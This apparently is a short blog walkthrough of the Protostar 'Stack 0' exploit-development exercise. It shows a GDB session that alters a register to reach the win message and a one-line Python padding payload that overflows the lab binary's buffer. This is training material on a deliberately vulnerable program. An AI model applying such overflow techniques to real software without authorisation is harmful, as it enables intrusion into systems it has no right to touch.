[ExpDev] Exploit Exercise | Protostar | Stack 0

What is Protostar?


Stack 0

Things to note

GDB (GNU Project Debugger)

$ gdb -q stack0                      # -q (quiet mode)
Reading symbols from /opt/protostar/bin/stack0...done.
(gdb) set disassembly-flavor intel # Intel Syntax (Who uses AT&T?)
(gdb) disas main # Disassembling main func
(gdb) break * 0x08048411              # Addr right above test
(gdb) run # Running the program
Breakpoint 1, main (argc=1, argv=0xbffff854) at stack0/stack0.c:13
13 in stack0/stack0.c
(gdb) x/2i $eip # Querying next 2 instructions
0x8048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x8048415 <main+33>: test eax,eax
(gdb) si # Single step instruction
0x08048415 13 in stack0/stack0.c
(gdb) info registers # Checking current registers
eax 0x0 0 <-- EAX is 0 (as modified = 0;)
ecx 0xbffff75c -1073744036
(gdb) set $eax = 0x1 # Changing EAX to 0x1
(gdb) continue
you have changed the 'modified' variable <-- Win!
Program exited with code 051.

BOF Exploit

#!/usr/bin/pythonpadding = 'A' * 70print padding
python exp.py > exploit
./stack0 < /tmp/stack0/exploit

Next challenge:

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store